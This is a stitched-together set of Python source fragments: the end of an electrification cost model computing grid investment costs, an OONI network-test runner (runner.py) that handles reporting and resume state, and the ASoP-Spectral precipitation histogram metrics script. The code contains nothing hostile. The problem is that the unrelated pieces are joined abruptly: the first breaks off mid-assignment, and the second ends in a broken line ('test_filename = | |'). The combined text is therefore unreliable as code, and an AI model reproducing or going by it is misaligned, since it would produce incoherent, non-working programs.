grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_transformer=True)
else:
return 0
logging.info('Calculate transformer investment cost')
self.df['InvestmentCostTransformer' + "{}".format(year)] = self.df.apply(res_investment_cost_transformer, axis=1)
def res_investment_cost_connection(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_connection=True)
else:
return 0
logging.info('Calculate connection investment cost')
self.df['InvestmentCostConnection' + "{}".format(year)] = self.df.apply(res_investment_cost_connection, axis=1)
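# Per-household grid infrastructure cost: the LV, MV, HV, transformer and connection
# components are summed and divided by the number of newly connected households
# (new connections / people per household), despite the 'Capita' in the column name.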
def infrastructure_cost(row):
if row[SET_NEW_CONNECTIONS + "{}".format(year)] > 0 and row[SET_ELEC_FINAL_CODE + "{}".format(year)] == 1:
return (row['InvestmentCostLV' + "{}".format(year)]
+ row['InvestmentCostMV' + "{}".format(year)] + row['InvestmentCostHV' + "{}".format(year)]
+ row['InvestmentCostTransformer' + "{}".format(year)] +
row['InvestmentCostConnection' + "{}".format(year)])/(row[SET_NEW_CONNECTIONS + "{}".format(year)] / row[SET_NUM_PEOPLE_PER_HH])
# return (row[SET_INVESTMENT_COST + "{}".format(year)] + row['InvestmentCostLV' + "{}".format(year)]
# + row['InvestmentCostMV' + "{}".format(year)] + row['InvestmentCostHV' + "{}".format(year)]
# + row['InvestmentCostTransformer' + "{}".format(year)] +
# row['InvestmentCostConnection' + "{}".format(year)]) / row[
# SET_NEW_CONNECTIONS + "{}".format(year)]
else:
return 0
logging.info('Calculating average infrastructure cost for grid connection')
self.df['InfrastructureCapitaCost' + "{}".format(year)] = self.df.apply(infrastructure_cost, axis=1)
# Update the actual electrification column with results
self.df[SET_ELEC_FUTURE_ACTUAL + "{}".format(year)] = self.df[SET_LIMIT + "{}".format(year)]
def delete_redundant_columns(self, year):
self.df['ResultsNoTimestep'] = self.df[SET_ELEC_FINAL_CODE + "{}".format(year)]
del self.df[SET_ELEC_FINAL_CODE + "{}".format(year)]
del self.df[SET_LCOE_MG_HYDRO + "{}".format(year)]
del self.df[SET_LCOE_MG_PV + "{}".format(year)]
del self.df[SET_LCOE_MG_WIND + "{}".format(year)]
del self.df[SET_LCOE_MG_DIESEL + "{}".format(year)]
del self.df[SET_LCOE_SA_DIESEL + "{}".format(year)]
del self.df[SET_LCOE_SA_PV + "{}".format(year)]
del self.df[SET_MIN_OFFGRID + "{}".format(year)]
del self.df[SET_MIN_OFFGRID_LCOE + "{}".format(year)]
del self.df[SET_MIN_OFFGRID_CODE + "{}".format(year)]
del self.df[SET_ELEC_FUTURE_GRID + "{}".format(year)]
del self.df[SET_ELEC_FUTURE_OFFGRID + "{}".format(year)]
del self.df[SET_ELEC_FUTURE_ACTUAL + "{}".format(year)]
del self.df[SET_LCOE_GRID + "{}".format(year)]
del self.df[SET_MIN_GRID_DIST + "{}".format(year)]
del self.df[SET_ELEC_ORDER + "{}".format(year)]
del self.df[SET_MIN_OVERALL + "{}".format(year)]
del self.df[SET_MIN_OVERALL_LCOE + "{}".format(year)]
del self.df[SET_MIN_OVERALL_CODE + "{}".format(year)]
del self.df[SET_LIMIT + "{}".format(year)]
del self.df[SET_ELEC_FINAL_GRID + "{}".format(year)]
del self.df[SET_ELEC_FINAL_OFFGRID + "{}".format(year)]
del self.df[SET_NEW_CAPACITY + "{}".format(year)]
del self.df[SET_INVESTMENT_COST + "{}".format(year)]
del self.df[SET_NEW_CONNECTIONS + "{}".format(year)]
del self.df[SET_ENERGY_PER_CELL + "{}".format(year)]
def calc_summaries(self, df_summary, sumtechs, year):
"""The next section calculates the summaries for technology split,
consumption added and total investment cost"""
logging.info('Calculate summaries')
# Population Summaries
df_summary[year][sumtechs[0]] = sum(self.df.loc[(self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 1) &
(self.df[SET_LIMIT + "{}".format(year)] == 1)]
[SET_POP + "{}".format(year)])
df_summary[year][sumtechs[1]] = sum(self.df.loc[(self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 2) &
(self.df[SET_LIMIT + "{}".format(year)] == 1)]
[SET_POP + "{}".format(year)])
df_summary[year][sumtechs[2]] = sum(self.df.loc[(self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 3) &
(self.df[SET_LIMIT + "{}".format(year)] == 1)]
[SET_POP + "{}".format(year)])
df_summary[year][sumtechs[3]] = sum(self.df.loc[(self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 4) &
(self.df[SET_LIMIT + "{}".format(year)] == 1)]
[SET_POP + "{}".format(year)])
df_summary[year][sumtechs[4]] =
# ooni/runner.py
import os
import sys
import time
import inspect
import traceback
import itertools
import random
import yaml
from twisted.python import reflect, usage
from twisted.internet import defer
from twisted.trial.runner import filenameToModule
from twisted.internet import reactor, threads
from txtorcon import TorProtocolFactory, TorConfig
from txtorcon import TorState, launch_tor
from ooni import config
from ooni.reporter import OONIBReporter, YAMLReporter, OONIBReportError
from ooni.inputunit import InputUnitFactory
from ooni.nettest import NetTestCase, NoPostProcessor
from ooni.utils import log, checkForRoot, pushFilenameStack
from ooni.utils import NotRootError, Storage
from ooni.utils.net import randomFreePort
def processTest(obj, cmd_line_options):
"""
Process the parameters and :class:`twisted.python.usage.Options` of a
:class:`ooni.nettest.Nettest`.
:param obj:
An uninstantiated old test, which should be a subclass of
:class:`ooni.plugoo.tests.OONITest`.
:param cmd_line_options:
A configured and instantiated :class:`twisted.python.usage.Options`
class.
"""
if not hasattr(obj.usageOptions, 'optParameters'):
obj.usageOptions.optParameters = []
if obj.inputFile:
obj.usageOptions.optParameters.append(obj.inputFile)
if obj.baseParameters:
for parameter in obj.baseParameters:
obj.usageOptions.optParameters.append(parameter)
if obj.baseFlags:
if not hasattr(obj.usageOptions, 'optFlags'):
obj.usageOptions.optFlags = []
for flag in obj.baseFlags:
obj.usageOptions.optFlags.append(flag)
options = obj.usageOptions()
options.parseOptions(cmd_line_options['subargs'])
obj.localOptions = options
if obj.inputFile:
obj.inputFilename = options[obj.inputFile[0]]
try:
log.debug("processing options")
tmp_test_case_object = obj()
tmp_test_case_object._checkRequiredOptions()
except usage.UsageError, e:
test_name = obj.name
log.err("There was an error in running %s!" % test_name)
log.err("%s" % e)
options.opt_help()
raise usage.UsageError("Error in parsing command line args for %s" % test_name)
if obj.requiresRoot:
try:
checkForRoot()
except NotRootError:
log.err("%s requires root to run" % obj.name)
sys.exit(1)
return obj
def isTestCase(obj):
try:
return issubclass(obj, NetTestCase)
except TypeError:
return False
def findTestClassesFromFile(cmd_line_options):
"""
Takes as input the command line config parameters and returns the test
case classes.
:param filename:
the absolute path to the file containing the ooniprobe test classes
:return:
A list of class objects found in a file or module given on the
commandline.
"""
filename = cmd_line_options['test']
classes = []
module = filenameToModule(filename)
for name, val in inspect.getmembers(module):
if isTestCase(val):
classes.append(processTest(val, cmd_line_options))
return classes
def makeTestCases(klass, tests, method_prefix):
"""
Takes a class some tests and returns the test cases. method_prefix is how
the test case functions should be prefixed with.
"""
cases = []
for test in tests:
cases.append((klass, method_prefix+test))
return cases
class NoTestCasesFound(Exception):
pass
def loadTestsAndOptions(classes, cmd_line_options):
"""
Takes a list of test classes and returns their testcases and options.
"""
method_prefix = 'test'
options = None
test_cases = []
for klass in classes:
tests = reflect.prefixedMethodNames(klass, method_prefix)
if tests:
test_cases = makeTestCases(klass, tests, method_prefix)
test_klass = klass()
options = test_klass._processOptions()
if not test_cases:
raise NoTestCasesFound
return test_cases, options
def runTestCasesWithInput(test_cases, test_input, yaml_reporter,
oonib_reporter=None):
"""
Runs in parallel all the test methods that are inside of the specified test case.
Reporting happens every time a Test Method has concluded running.
Once all the test methods have been called we check to see if the
postProcessing class method returns something. If it does return something
we will write this as another entry inside of the report called post_processing.
Args:
test_cases (list): A list of tuples containing the test_class (a
class) and the test_method (a string)
test_input (instance): Any instance that will be passed as input to
the test.
yaml_reporter: An instance of :class:ooni.reporter.YAMLReporter
oonib_reporter: An instance of :class:ooni.reporter.OONIBReporter. If
this is set to none then we will only report to the YAML reporter.
"""
# This is used to store a copy of all the test reports
tests_report = {}
def write_report(test_instance, test_name):
if not oonib_reporter:
return yaml_reporter.testDone(test_instance, test_name)
d1 = oonib_reporter.testDone(test_instance, test_name)
d2 = yaml_reporter.testDone(test_instance, test_name)
dl = defer.DeferredList([d1, d2])
@dl.addErrback
def reportingFailed(failure):
log.err("Error in reporting %s" % test_name)
log.exception(failure)
return dl
def test_done(result, test_instance, test_name):
log.msg("Finished running %s" % test_name)
log.debug("Deferred callback result: %s" % result)
tests_report[test_name] = dict(test_instance.report)
return write_report(test_instance, test_name)
def test_error(failure, test_instance, test_name):
log.err("Error in running %s" % test_name)
log.exception(failure)
return write_report(test_instance, test_name)
def tests_done(result, test_class):
test_instance = test_class()
test_instance.report = {}
test_instance.input = None
test_instance._start_time = time.time()
post = getattr(test_instance, 'postProcessor')
try:
post_processing = post(tests_report)
if not oonib_reporter:
return yaml_reporter.testDone(test_instance, 'summary')
d1 = oonib_reporter.testDone(test_instance, 'summary')
d2 = yaml_reporter.testDone(test_instance, 'summary')
return defer.DeferredList([d1, d2])
except NoPostProcessor:
log.debug("No post processor configured")
return
dl = []
for test_case in test_cases:
log.debug("Processing %s" % test_case[1])
test_class = test_case[0]
test_method = test_case[1]
log.debug("Running %s with %s..." % (test_method, test_input))
test_instance = test_class()
test_instance.input = test_input
test_instance.report = {}
# use this to keep track of the test runtime
test_instance._start_time = time.time()
# call setups on the test
test_instance._setUp()
test_instance.setUp()
test = getattr(test_instance, test_method)
d = defer.maybeDeferred(test)
d.addCallback(test_done, test_instance, test_method)
d.addErrback(test_error, test_instance, test_method)
dl.append(d)
test_methods_d = defer.DeferredList(dl)
test_methods_d.addCallback(tests_done, test_cases[0][0])
@test_methods_d.addErrback
def deferredListFailed(failure):
log.err("Error Test Method Deferred List")
log.exception(failure)
return test_methods_d
def runTestCasesWithInputUnit(test_cases, input_unit, yaml_reporter,
oonib_reporter):
"""
Runs the Test Cases that are given as input in parallel.
A Test Case is a subclass of ooni.nettest.NetTestCase and a list of
methods.
The deferred list will fire once all the test methods have been
run once per item in the input unit.
test_cases: A list of tuples containing the test class and the test method as a string.
input_unit: A generator that yields an input per iteration
"""
log.debug("Running test cases with input unit")
dl = []
for test_input in input_unit:
log.debug("Running test with this input %s" % test_input)
d = runTestCasesWithInput(test_cases,
test_input, yaml_reporter, oonib_reporter)
dl.append(d)
return defer.DeferredList(dl)
class InvalidResumeFile(Exception):
pass
class noResumeSession(Exception):
pass
def loadResumeFile():
"""
Sets the singleton stateDict object to the content of the resume file.
If the file is empty then it will create an empty one.
Raises:
:class:ooni.runner.InvalidResumeFile if the resume file is not valid
"""
if not config.stateDict:
try:
with open(config.resume_filename) as f:
config.stateDict = yaml.safe_load(f)
except:
log.err("Error loading YAML file")
raise InvalidResumeFile
if not config.stateDict:
with open(config.resume_filename, 'w+') as f:
yaml.safe_dump(dict(), f)
config.stateDict = dict()
elif isinstance(config.stateDict, dict):
return
else:
log.err("The resume file is of the wrong format")
raise InvalidResumeFile
def resumeTest(test_filename, input_unit_factory):
"""
Returns an input_unit_factory advanced to the index reached in the previous run
of the test for the specified test_filename.
Args:
test_filename (str): the filename of the test that is being run
including the .py extension.
input_unit_factory (:class:ooni.inputunit.InputUnitFactory): with the
same input of the past run.
Returns:
:class:ooni.inputunit.InputUnitFactory that is at the index of the
previous test run.
"""
try:
idx = config.stateDict[test_filename]
for x in range(idx):
try:
input_unit_factory.next()
except StopIteration:
log.msg("Previous run was complete")
return input_unit_factory
return input_unit_factory
except KeyError:
log.debug("No resume key found for selected test name. It is therefore 0")
config.stateDict[test_filename] = 0
return input_unit_factory
@defer.inlineCallbacks
def updateResumeFile(test_filename):
"""
update the resume file with the current stateDict state.
"""
log.debug("Acquiring lock for %s" % test_filename)
yield config.resume_lock.acquire()
current_resume_state = config.stateDict
yaml.safe_dump(current_resume_state, open(config.resume_filename, 'w+'))
log.debug("Releasing lock for %s" % test_filename)
config.resume_lock.release()
defer.returnValue(config.stateDict[test_filename])
@defer.inlineCallbacks
def increaseInputUnitIdx(test_filename):
"""
Args:
test_filename (str): the filename of the test that is being run
including the .py extension.
input_unit_idx (int): the current input unit index for the test.
"""
config.stateDict[test_filename] += 1
yield updateResumeFile(test_filename)
def updateProgressMeters(test_filename, input_unit_factory,
test_case_number):
"""
Update the progress meters for keeping track of test state.
"""
if test_filename not in config.state:
config.state[test_filename] = Storage()
config.state[test_filename].per_item_average = 2.0
input_unit_idx = float(config.stateDict[test_filename])
input_unit_items = len(input_unit_factory)
test_case_number = float(test_case_number)
total_iterations = input_unit_items * test_case_number
current_iteration = input_unit_idx * test_case_number
log.debug("input_unit_items: %s" % input_unit_items)
log.debug("test_case_number: %s" % test_case_number)
log.debug("Test case number: %s" % test_case_number)
log.debug("Total iterations: %s" % total_iterations)
log.debug("Current iteration: %s" % current_iteration)
def progress():
return (current_iteration / total_iterations) * 100.0
config.state[test_filename].progress = progress
def eta():
return (total_iterations - current_iteration) \
* config.state[test_filename].per_item_average
config.state[test_filename].eta = eta
config.state[test_filename].input_unit_idx = input_unit_idx
config.state[test_filename].input_unit_items = input_unit_items
@defer.inlineCallbacks
def runTestCases(test_cases, options, cmd_line_options):
log.debug("Running %s" % test_cases)
log.debug("Options %s" % options)
log.debug("cmd_line_options %s" % dict(cmd_line_options))
test_inputs = options['inputs']
# Set a default reporter
if not cmd_line_options['collector'] and not \
cmd_line_options['no-default-reporter']:
with open('collector') as f:
reporter_url = random.choice(f.readlines())
reporter_url = reporter_url.split('#')[0].strip()
cmd_line_options['collector'] = reporter_url
oonib_reporter = OONIBReporter(cmd_line_options)
yaml_reporter = YAMLReporter(cmd_line_options)
if cmd_line_options['collector']:
log.msg("Using remote collector, please be patient while we create the report.")
try:
yield oonib_reporter.createReport(options)
except OONIBReportError:
log.err("Error in creating new report")
log.msg("We will only create reports to a file")
oonib_reporter = None
else:
oonib_reporter = None
yield yaml_reporter.createReport(options)
log.msg("Reporting to file %s" % yaml_reporter._stream.name)
try:
input_unit_factory = InputUnitFactory(test_inputs)
input_unit_factory.inputUnitSize = int(cmd_line_options['parallelism'])
except Exception, e:
log.exception(e)
try:
loadResumeFile()
except InvalidResumeFile:
log.err("Error in loading resume file %s" % config.resume_filename)
log.err("Try deleting the resume file")
raise InvalidResumeFile
test_filename = | |
# Repository: nick-klingaman/ASoP
# Copyright 2021 Lawrence Livermore National Security, LLC
"""
This script is used by cmec-driver to run the ASoP-Spectral metrics.
It is based on the workflow in ASoP1_spectral_main.py and
can be called with the aruments listed below. Keys that can be set
in the config or settings dictionary are: region, timescale-all, mask,
dates-all, and season-all.
Arguments:
* model_dir:
directory containing model data
* obs_dir:
directory containing obs data
* wk_dir:
output directory
* config_path:
JSON config file (optional)
* settings:
dictionary of settings (optional)
Author: <NAME>
"""
import argparse
from datetime import datetime, timezone
import glob
import itertools
import json
import os
from platform import python_version
import iris
import make_hist_maps
import plot_hist_maps
import plot_hist1d
from ASoP_Spectral_metric import plot_metric
from set_descriptive_text import set_descriptive_text
# set date once for provenance
current_date = datetime.now(timezone.utc).strftime("%b %d %Y %H:%M:%S")+" UTC"
# setting output directory names
figure_dir_name = "asop_figures"
metrics_dir_name = "asop_metrics"
def main(model_dir, obs_dir, wk_dir, config_path=None, settings=None):
"""
Read in data and create histogram cubes, save these to netcdf files.
Then plot histogram maps and some regional 1d histograms
Arguments:
* model_dir
Directory containing model precipitation time series and/or
pre-calculated histogram cubes
* obs_dir
Directory containing observational precipitation time series
and/or pre-calculated histogram cubes.
* wk_dir
Path to output directory
* config_path (optional)
Path to configuration JSON (for CMEC driver)
* settings (optional)
Dictionary containing choices for region and timescale
"""
# Load CMEC config
if config_path is not None:
print("Loading configuration file")
with open (config_path,"r") as fname:
settings=json.load(fname)["ASoP/Spectral"]
print("Settings from configuration file:\n",json.dumps(settings, indent=4))
elif settings is None:
settings={
"regions": {"default":[-10.0, 10.0, 60.0, 160.0]},
"figure_type": "png",
"timescale-all": "",
"mask": None,
"dates-all": "",
"season-all": ""}
print("Using default settings")
# Re-order the regions from Coherence to Spectral format
for r in settings["regions"]:
settings["regions"][r][:]=[settings["regions"][r][i] for i in [2,0,3,1]]
# Clean up extension in case there is a leading '.'
ext = '.'+settings.get('figure_type','png').replace(".","")
# Set up output files and directories
json_filename=os.path.join(wk_dir,"output.json")
initialize_descriptive_json(json_filename,wk_dir,model_dir,obs_dir)
os.mkdir(os.path.join(wk_dir,figure_dir_name))
os.mkdir(os.path.join(wk_dir,metrics_dir_name))
# Get input file lists and separate histogram cubes from timeseries
hist_input_model,model_filenames=get_filename_lists(model_dir)
hist_input_obs,obs_filenames=get_filename_lists(obs_dir)
# Make and save histogram cubes if they don't already exist
# for the timeseries files
make_hist_model,new_hist_model=check_histogram_files(model_filenames)
new_hist_model=[os.path.join(wk_dir,f) for f in new_hist_model]
make_hist_obs,new_hist_obs=check_histogram_files(obs_filenames)
new_hist_obs=[os.path.join(wk_dir,f) for f in new_hist_obs]
for hlist in [make_hist_model,make_hist_obs]:
if hlist:
print("Making histograms")
making_histogram_files(hlist,wk_dir)
# Combine input and newly made histogram files into one list
hist_filenames_model=sorted(hist_input_model+new_hist_model)
hist_filenames_obs=(hist_input_obs+new_hist_obs)
if len(hist_filenames_obs) > 1:
raise RuntimeError("More than one benchmark dataset found.")
elif len(hist_filenames_obs) == 0:
raise RuntimeError("No control datasets provided")
# Want obs to go first in list for diffs
hist_filenames=hist_filenames_obs+hist_filenames_model
runtitles_long=make_runtitle(hist_filenames,settings)
runtitles_short=make_runtitle(hist_filenames,settings,model_only=True)
region_dict=settings.get("regions",{"default":[60.0,-10.0,160.0,10.0]})
for region in region_dict:
# Plot histogram maps
print("Plotting histogram maps")
myregion=region_dict[region]
for item in hist_filenames_model:
title1=runtitles_long[item]
title2=runtitles_long[hist_filenames_obs[0]]
plotname_root=figure_dir_name+'/compare_{0}_{1}_{2}'.format(title1,title2,region)
filenames=[item,hist_filenames_obs[0]]
plot_histogram_maps(filenames,plotname_root,wk_dir,myregion,ext,settings)
# 1d histogram plots
print("Plotting 1d histograms")
timescale=settings.get("timescale-all",None)
plottitle='All datasets'
plotname_root=figure_dir_name+'/compare_as_1dhistograms_{0}'.format(region)
# Plot 1d histograms of model data with obs overplotted
runtitles_model=[runtitles_short[f] for f in hist_filenames_model]
runtitles_obs=[runtitles_short[hist_filenames_obs[0]]]
plot_1d_histograms(
hist_filenames_model,runtitles_model, \
hist_filenames_obs,runtitles_obs, \
timescale,myregion,plottitle,plotname_root,wk_dir,ext)
# 1d histogram DIFFERENCE plots
print("Plotting 1d histogram differences")
title_long=runtitles_long[hist_filenames_obs[0]]
title_short=runtitles_short[hist_filenames_obs[0]]
titles=[[title_short,runtitles_short[f]] for f in hist_filenames_model]
filenames = [[hist_filenames_obs[0],f] for f in hist_filenames_model]
plottitle='Differences between datasets'
plotname_root=figure_dir_name+'/compare_as_1dhist_differences_{0}_{1}_{2}'.format(title_long,"all_models",region)
# Plot differences between 1d histograms from 1 model datasets
plot_1d_histogram_diffs(
filenames,titles,timescale, \
myregion,plottitle,plotname_root,wk_dir,ext)
# plot histogram metric
mask=settings.get("mask",None)
print("Mask: " + str(mask))
dates=settings.get("dates-all","")
season=settings.get("season-all","")
# Mask file must be present for this metric
if (mask is not None) and (timescale is not None):
if os.path.exists(mask):
print("Making histogram metrics")
json_filename=wk_dir+"/"+metrics_dir_name+"/histogram_metric.json"
model_combo=[[f,hist_filenames_obs[0]] for f in hist_filenames_model]
initialize_metrics_json(json_filename,hist_filenames_obs[0],hist_filenames_model,settings)
make_histogram_metrics(model_combo,season,timescale,dates,mask, \
wk_dir,json_filename,settings,ext)
else:
raise RuntimeError("Mask file not found.")
else:
for keyword,val in zip([mask,timescale],["mask","timescale-all"]):
if val is None:
raise RuntimeError("Keyword not found: {0}",keyword)
# output html page
write_index_html(wk_dir,region_dict,ext)
print('Processing completed OK!')
return
def check_histogram_files(filename_list):
"""
For the timeseries files in model_filenames, check if an
equivalent histogram file already exists.
Arguments:
* filename_list
List of precipitation timeseries files
"""
make_hist=[]
new_hist=[]
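# The expected histogram filename is the timeseries filename with its extension
# replaced by '_hist.nc'.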
check_for_hist=[".".join(f.split(".")[:-1])+"_hist.nc" for f in filename_list]
for data,hist in zip(filename_list,check_for_hist):
if not os.path.exists(hist):
make_hist.append(data)
new_hist.append(os.path.basename(hist))
return make_hist, new_hist
def making_histogram_files(filename_list,wk_dir):
"""
Read in data and create histogram cubes, save these to netcdf files.
Arguments:
* filename_list
List of precipitation timeseries files
* wk_dir
Path to output directory
"""
desc = {}
for fname in filename_list:
print("Loading cube for",fname)
fname_tmp = os.path.basename(fname)
hname = os.path.join(wk_dir,".".join(fname_tmp.split(".")[:-1])+"_hist.nc")
ppndata1=make_hist_maps.read_data_cube(fname)
ppn_hist_cube=make_hist_maps.make_hist_ppn(ppndata1)
iris.save(ppn_hist_cube, hname)
desc.update({os.path.relpath(hname,start=wk_dir): {
"long_name": "iris histogram cubes",
"description": "histograms saved individually for model and obs data"}})
update_json("data",desc,wk_dir+"/output.json")
return
def plot_histogram_maps(hist_filenames,plotname_root,wk_dir,region,ext,settings):
"""
Plot histogram maps
"""
hist_filename1=hist_filenames[0]
hist_filename2=hist_filenames[1]
ppn_hist_cube1=make_hist_maps.read_data_cube(hist_filename1)
ppn_hist_cube2=make_hist_maps.read_data_cube(hist_filename2)
avg_rain_bins_a,avg_rain_bins_frac_a=make_hist_maps.calc_rain_contr(ppn_hist_cube1)
avg_rain_bins_b,avg_rain_bins_frac_b=make_hist_maps.calc_rain_contr(ppn_hist_cube2)
ppn_names=make_runtitle([hist_filename1,hist_filename2],settings)
ppn1_name=ppn_names[hist_filename1].replace("_"," ")
ppn2_name=ppn_names[hist_filename2].replace("_"," ")
names=make_runtitle([hist_filename1,hist_filename2],settings,model_only=True)
runtitle="{0} vs {1}".format(names[hist_filename1].replace("_"," "),names[hist_filename2].replace("_"," "))
# (optional) Define how you want to lump the bins together (below is the default)
all_ppn_bounds = [(0.005, 10.), (10., 50.), (50., 100.), (100., 3000.)]
# Plot as actual contributions for specific region, e.g. 60 to 160E,10S to 10N
desc={}
plotname='{0}_actual_contributions{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist_maps.plot_rain_contr(avg_rain_bins_a,avg_rain_bins_b,plotname,
runtitle,ppn1_name,ppn2_name,all_ppn_bounds,region=region)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Actual contribution of each timescale for region {0}".format(region)}})
# Plot as fractional contributions
plotname='{0}_fractional_contributions{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist_maps.plot_rain_contr(avg_rain_bins_frac_a,avg_rain_bins_frac_b,plotname,
runtitle,ppn1_name,ppn2_name,all_ppn_bounds,region=region,frac=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Fractional contribution of each timescale for region {0}".format(region)}})
update_json("plots",desc, wk_dir+"/output.json")
return
def plot_1d_histograms(filenames,runtitles,filenames_obs,runtitles_obs,timescale,
myregion,plottitle,plotname_root,wk_dir,ext):
"""
Plot 1d histograms for a small region.
This example uses histogram cubes pre-calculated from two different model datasets
on the same timescale, and compares with those from two observational datasets.
NOTE that the region and the timescale will appear automatically in the plot title
"""
desc={}
plotname='{0}_actual{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist1d.plot_1dhist(plotname,myregion,filenames,runtitles,plottitle,timescale=timescale,
filenames_obs=filenames_obs,runtitles_obs=runtitles_obs,log=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Actual histogram"}})
plotname='{0}_fractional{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist1d.plot_1dhist(plotname,myregion,filenames,runtitles,plottitle,timescale=timescale,
filenames_obs=filenames_obs,runtitles_obs=runtitles_obs,frac=1,log=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Fractional histogram"}})
update_json("plots",desc,wk_dir+"/output.json")
return
def plot_1d_histogram_diffs(filenames,runtitles,timescale,
myregion,plottitle,plotname_root,wk_dir,ext):
"""
Plot differences between 1d histograms for a small region.
This example uses histogram cubes pre-calculated for pairs of datasets
(observations vs. model) on the same timescale and plots their differences.
NOTE that the region and the timescale will appear automatically in the plot title
"""
desc={}
plotname='{0}_actual{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist1d.plot_1dhist(plotname,myregion,filenames,runtitles,plottitle,timescale,log=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Actual 1d histogram for region "+str(myregion)}})
plotname='{0}_fractional{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist1d.plot_1dhist(plotname,myregion,filenames,runtitles,plottitle,timescale,frac=1,log=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Fractional 1d histogram for "+str(myregion)}})
update_json("plots",desc,wk_dir+"/output.json")
return
def make_histogram_metrics(hist_combo,season,timescale,dates,mask,wk_dir,json_filename,settings,ext):
"""Set up and run the histogram metrics and difference plot."""
for ppn1,ppn2 in hist_combo:
titles=make_runtitle([ppn1,ppn2],settings,model_only=True)
name1=titles[ppn1]
name2=titles[ppn2]
tmp_list = [x for x in [timescale,season,dates] if x != ""]
plotname=wk_dir+"_".join(["/"+figure_dir_name+"/histogram_metric",name1,name2]+tmp_list)+ext
index_list=plot_metric(ppn1,ppn2,name1,name2,season,timescale,dates,mask,plotname)
result_list=[index_list[x].data.item() for x in range(6)]
# Add metrics to file. Use full name as key.
json_title=make_runtitle([ppn1,ppn2],settings)[ppn1]
results={json_title: {
"histogram overlap": {
"global": result_list[0],
"land": result_list[1],
"sea": result_list[2],
"tropics": result_list[3],
"NH mid-lat": result_list[4],
"SH mid-lat": result_list[5]
}
}
}
update_json("RESULTS",results,json_filename)
# Write figure metadata
desc={os.path.relpath(plotname,start=wk_dir): {
"description": "histogram metric global plot"}}
update_json("plots",desc,wk_dir+"/output.json")
# Write metrics file metadata
desc={os.path.relpath(json_filename,start=wk_dir): {
"description": "Histogram overlap metrics"}}
update_json("metrics",desc,wk_dir+"/output.json")
return
def get_filename_lists(directory):
"""Return lists of files in the directory, separating histogram cubes
end with '_hist.nc' from timeseries files."""
hist_list=[]
tseries_list=[]
if (directory is not None) and (directory != 'None'):
file_list=sorted(glob.glob(directory+"/*"))
hist_list = [f for f in file_list if f.endswith("_hist.nc")]
tseries_list = [f for f in file_list if f not in set(hist_list)]
return hist_list, tseries_list
def get_cube_name(data_cube,default_name="no name"):
# Return data set name obtained by checking common name variables
cube_name=default_name
for key in ["source_id","short_name","name","source","model"]:
if key in data_cube.attributes:
cube_name=data_cube.attributes[key]
break
if "variant_label" in data_cube.attributes:
cube_name+=("_"+data_cube.attributes["variant_label"])
return cube_name
def make_runtitle(data_cube_names,settings,model_only=False,return_timescale=False):
"""
Return a list of names for each data cube for use in figure titles. Option to
return timescale dictionary for histogram map headings.
"""
cube_name={}
extra_params = ["timescale","dates","season"]
timescale = dict.fromkeys(data_cube_names,"")
for fname in data_cube_names:
fbasename=os.path.basename(fname)
tmp_fname="_".join(fbasename.split("_")[:-1])+".nc"
if "name" in settings.get(fbasename,{}):
cube_name[fname]=settings[fbasename]["name"].replace(" ","_")
elif "name" in settings.get(tmp_fname,{}):
cube_name[fname]=settings[tmp_fname]["name"].replace(" ","_")
else:
data_cube=iris.load_cube(fname)
cube_name[fname]=get_cube_name(data_cube).replace(" ","_")
# Get season, dates, timescale if available in settings
for item in extra_params:
tmp="unknown"
# First see if 'all' setting exists
if settings.get(item+"-all",False):
tmp=settings[item+"-all"]
# Check for setting under histogram or regular filename
elif item in settings.get(fbasename,{}):
tmp=settings[fbasename][item]
elif item in settings.get(tmp_fname,{}):
tmp=settings[tmp_fname][item]
if tmp!="unknown" and not model_only:
cube_name[fname]=cube_name[fname]+"_"+tmp
if return_timescale and item=="timescale":
timescale[fname]=tmp
if return_timescale:
return cube_name,timescale
return cube_name
def initialize_descriptive_json(json_filename,wk_dir,model_dir,obs_dir):
"""
Create metadata JSON file that describes package outputs.
"""
output = {"provenance":{},"index": "index.html","data":{},"metrics":{},"plots":{},"html":"index.html"}
log_path = wk_dir + "/asop_spectral.log.txt"
output["provenance"] = {
"environment": {'iris':iris.__version__,'python':python_version()},
"modeldata": model_dir,
"obsdata": obs_dir,
"log": log_path,
"date": current_date}
with open(json_filename,"w") as output_json:
json.dump(output,output_json, indent=2)
return
def initialize_metrics_json(json_filename,control,test,settings):
"""
Initalize histogram metrics json for writing metrics
from ASoP_Spectral_metric.py
"""
schema = {"name": "CMEC", "version": "v1", "package": "ASoP"}
dims = {
"json_structure": ["test dataset","metric","region"],
"dimensions": {
